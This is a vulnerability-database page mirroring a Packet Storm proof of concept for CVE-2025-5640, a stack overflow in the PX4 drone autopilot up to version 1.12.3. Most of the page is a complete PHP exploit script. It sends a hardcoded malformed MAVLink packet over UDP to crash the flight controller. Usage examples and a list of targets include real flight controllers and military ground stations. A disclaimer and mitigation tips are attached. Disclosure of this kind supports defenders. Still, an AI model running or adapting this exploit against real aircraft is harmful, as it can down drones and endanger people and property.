Vulners
Lucene search
๐ PX4 Military UAV Autopilot 1.12.3 Denial of Service
๐๏ธย 02 Dec 2025ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 196ย Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2025-5640 | 5 Jun 202506:48 | โ | circl |
 | PX4 Drone Autopilot ๅฎๅ จๆผๆด | 5 Jun 202500:00 | โ | cnnvd |
 | CVE-2025-5640 | 5 Jun 202506:00 | โ | cve |
 | CVE-2025-5640 PX4-Autopilot TRAJECTORY_REPRESENTATION_WAYPOINTS Message mavlink_receiver.cpp stack-based overflow | 5 Jun 202506:00 | โ | cvelist |
 | PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS) | 26 Jun 202500:00 | โ | exploitdb |
 | EUVD-2025-16967 | 3 Oct 202520:07 | โ | euvd |
 | Exploit for CVE-2025-5640 | 21 Jun 202511:52 | โ | githubexploit |
 | CVE-2025-5640 | 5 Jun 202506:15 | โ | nvd |
| ๐ PX4 Military UAV Autopilot 1.12.3 Denial of Service | 26 Jun 202500:00 | โ | packetstorm |
| ๐ Keras 2.15 Insecure Deserialization | 18 Dec 202500:00 | โ | packetstorm |
10
=============================================================================================================================================
| # Title : PX4 Military UAV Autopilot 1.12.3 Remote DoS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://docs.px4.io/v1.12/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/202894/ & CVE-2025-5640
[+] Summary : This PoC exploits a Stack-Based Buffer Overflow vulnerability in PX4 Military UAV Autopilot versions up to 1.12.3,
allowing an attacker to send a poorly formatted MAVLink message of type:
TRAJECTORY_REPRESENTATION_WAYPOINTS to cause a complete failure (Denial of Service) of the UAV's autopilot.
The PoC works by sending a malicious MAVLink payload via UDP to the common control port (14540โ14550).
Receiving data exceeding the expected size overwrites the stack memory, causing the autopilot to malfunction
and the aircraft to enter Failsafe mode or lose connectivity entirely.
[+] POC : php poc.php
<?php
/**
* Author: indoushka
* Description:
* Stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3
* triggered via malformed MAVLink TRAJECTORY_REPRESENTATION_WAYPOINTS message.
*/
class PX4UAVExploit {
private $targetIp;
private $targetPort;
private $timeout;
private $verbose;
// Malformed MAVLink hex payload
private $hexPayload = "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b7812731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6";
public function __construct($ip = "127.0.0.1", $port = 14540, $timeout = 5, $verbose = false) {
$this->targetIp = $ip;
$this->targetPort = $port;
$this->timeout = $timeout;
$this->verbose = $verbose;
}
public function run($mode = "dos") {
$this->showBanner();
try {
switch ($mode) {
case "check":
$this->checkConnection();
break;
case "dos":
$this->executeDos();
break;
default:
$this->error("Unknown mode: $mode");
return;
}
} catch (Exception $e) {
$this->error("Execution failed: " . $e->getMessage());
}
}
private function checkConnection() {
$this->info("Testing connection to PX4 autopilot...");
$this->info("Target: {$this->targetIp}:{$this->targetPort}");
// Create UDP socket
$socket = $this->createUdpSocket();
if (!$socket) {
$this->error("Failed to create UDP socket");
return;
}
// Send heartbeat check
$heartbeat = $this->createMavlinkHeartbeat();
$result = socket_sendto($socket, $heartbeat, strlen($heartbeat), 0, $this->targetIp, $this->targetPort);
if ($result === false) {
$this->error("Failed to send heartbeat");
} else {
$this->info("Heartbeat sent successfully");
// Wait for response
socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array('sec' => $this->timeout, 'usec' => 0));
$response = '';
$from = '';
$port = 0;
$bytes = socket_recvfrom($socket, $response, 1024, 0, $from, $port);
if ($bytes > 0) {
$this->success("PX4 autopilot is responsive! Received $bytes bytes from $from:$port");
$this->info("Connection test PASSED");
} else {
$this->warning("No response received - PX4 may be offline or not listening");
}
}
socket_close($socket);
}
private function executeDos() {
$this->warning("๐จ LAUNCHING DENIAL OF SERVICE ATTACK ๐จ");
$this->info("Target: {$this->targetIp}:{$this->targetPort}");
$this->info("This will crash the PX4 autopilot if vulnerable");
// Countdown
for ($i = 5; $i > 0; $i--) {
$this->info("Sending exploit in $i seconds... (Ctrl+C to abort)");
sleep(1);
}
$socket = $this->createUdpSocket();
if (!$socket) {
$this->error("Failed to create UDP socket for attack");
return;
}
// Convert hex payload to binary
$payload = hex2bin($this->hexPayload);
if (!$payload) {
$this->error("Failed to decode hex payload");
socket_close($socket);
return;
}
$this->info("Sending malformed MAVLink packet...");
// Send multiple packets for reliability
$packetsSent = 0;
for ($i = 0; $i < 3; $i++) {
$result = socket_sendto($socket, $payload, strlen($payload), 0, $this->targetIp, $this->targetPort);
if ($result === false) {
$this->error("Failed to send packet #" . ($i + 1));
} else {
$this->info("Packet #" . ($i + 1) . " sent successfully ($result bytes)");
$packetsSent++;
}
usleep(100000); // 100ms delay between packets
}
socket_close($socket);
if ($packetsSent > 0) {
$this->success("Exploit packets delivered successfully");
$this->warning("PX4 autopilot should crash if vulnerable to CVE-2025-5640");
$this->showPostExploitationInfo();
} else {
$this->error("No packets were sent successfully");
}
}
private function createUdpSocket() {
$socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if ($socket === false) {
return false;
}
// Set socket options
socket_set_option($socket, SOL_SOCKET, SO_REUSEADDR, 1);
socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array('sec' => $this->timeout, 'usec' => 0));
return $socket;
}
private function createMavlinkHeartbeat() {
// Simple MAVLink heartbeat message (system ID 255, component ID 0)
$heartbeat = hex2bin("fe09000000ff0000000000000000000000000203d403");
return $heartbeat ?: '';
}
private function showPostExploitationInfo() {
$this->info("
๐ POST-EXPLOITATION ACTIONS:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1. Monitor UAV Status:
โข Check if autopilot stopped responding
โข Verify telemetry data interruption
โข Observe flight controller behavior
2. Impact Assessment:
โข Autopilot crash = UAV may enter failsafe mode
โข Possible flight termination in worst case
โข Ground station connection loss
3. Recovery Actions:
โข Restart PX4 software
โข Reboot flight controller
โข Re-establish MAVLink connections
๐ก๏ธ MITIGATION RECOMMENDATIONS:
โข Update PX4 to version > 1.12.3
โข Implement MAVLink message validation
โข Use message authentication
โข Network segmentation for UAV communications
");
}
private function showBanner() {
echo "
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PX4 UAV AUTOPILOT EXPLOIT โ
โ CVE-2025-5640 - Remote DoS Exploit โ
โ โ
โ Target: PX4 Military UAV Autopilot <= 1.12.3 โ
โ Vulnerability: Stack-based Buffer Overflow โ
โ Impact: Denial of Service (Autopilot Crash) โ
โ Author: indoushka โ
โ PHP Implementation โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\n\n";
}
private function info($message) {
echo "โน๏ธ [INFO] " . $message . "\n";
}
private function success($message) {
echo "โ
[SUCCESS] " . $message . "\n";
}
private function warning($message) {
echo "โ ๏ธ [WARNING] " . $message . "\n";
}
private function error($message) {
echo "โ [ERROR] " . $message . "\n";
}
}
function showHelp() {
echo "
๐ PX4 UAV Autopilot DoS Exploit (CVE-2025-5640)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ ๏ธ Usage:
php px4_exploit.php [OPTIONS]
๐ Options:
--ip Target IP address (default: 127.0.0.1)
--port Target UDP port (default: 14540)
--mode Operation mode: dos, check (default: dos)
--timeout Timeout in seconds (default: 5)
--help Show this help information
๐ฏ Examples:
# Check connection to PX4
php px4_exploit.php --mode check --ip 192.168.1.100 --port 14550
# Launch DoS attack
php px4_exploit.php --mode dos --ip 192.168.1.100 --port 14550
# Attack local SITL instance
php px4_exploit.php --mode dos
โ ๏ธ LEGAL DISCLAIMER:
This tool is for authorized security testing only.
Do not use against systems you don't own or have permission to test.
Military UAV systems are critical infrastructure.
Unauthorized access may violate national and international laws.
๐ง Technical Details:
โข Vulnerability: Buffer overflow in MAVLink message handling
โข Affected: PX4 Autopilot <= 1.12.3
โข Protocol: MAVLink over UDP
โข Port: Typically 14540-14550
โข Impact: Autopilot crash โ UAV failsafe/termination
๐ฏ Target Environments:
โข PX4 SITL (Software In The Loop)
โข Real PX4 flight controllers
โข Military UAV ground control stations
โข Drone testing laboratories
\n";
}
function parseArguments($argv) {
$options = [
'ip' => '127.0.0.1',
'port' => 14540,
'mode' => 'dos',
'timeout' => 5,
'help' => false
];
for ($i = 1; $i < count($argv); $i++) {
switch ($argv[$i]) {
case '--ip':
$options['ip'] = $argv[++$i] ?? '127.0.0.1';
break;
case '--port':
$options['port'] = intval($argv[++$i] ?? 14540);
break;
case '--mode':
$options['mode'] = $argv[++$i] ?? 'dos';
break;
case '--timeout':
$options['timeout'] = intval($argv[++$i] ?? 5);
break;
case '--help':
$options['help'] = true;
break;
}
}
return $options;
}
// Main execution
if (php_sapi_name() !== 'cli') {
die("โ This script must be run from command line\n");
}
$options = parseArguments($argv);
if ($options['help']) {
showHelp();
exit(0);
}
// Validate mode
if (!in_array($options['mode'], ['dos', 'check'])) {
echo "โ Invalid mode. Use 'dos' or 'check'\n";
showHelp();
exit(1);
}
// Validate IP address
if (!filter_var($options['ip'], FILTER_VALIDATE_IP)) {
echo "โ Invalid IP address: {$options['ip']}\n";
exit(1);
}
// Validate port
if ($options['port'] < 1 || $options['port'] > 65535) {
echo "โ Invalid port number: {$options['port']}\n";
exit(1);
}
try {
$exploit = new PX4UAVExploit(
$options['ip'],
$options['port'],
$options['timeout'],
true
);
$exploit->run($options['mode']);
} catch (Exception $e) {
echo "โ Fatal error: " . $e->getMessage() . "\n";
exit(1);
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2025 00:00Current
4.5Medium risk
Vulners AI Score4.5
CVSS 21.7
CVSS 3.13.3
CVSS 44.8
CVSS 33.3
EPSS0.00191
SSVC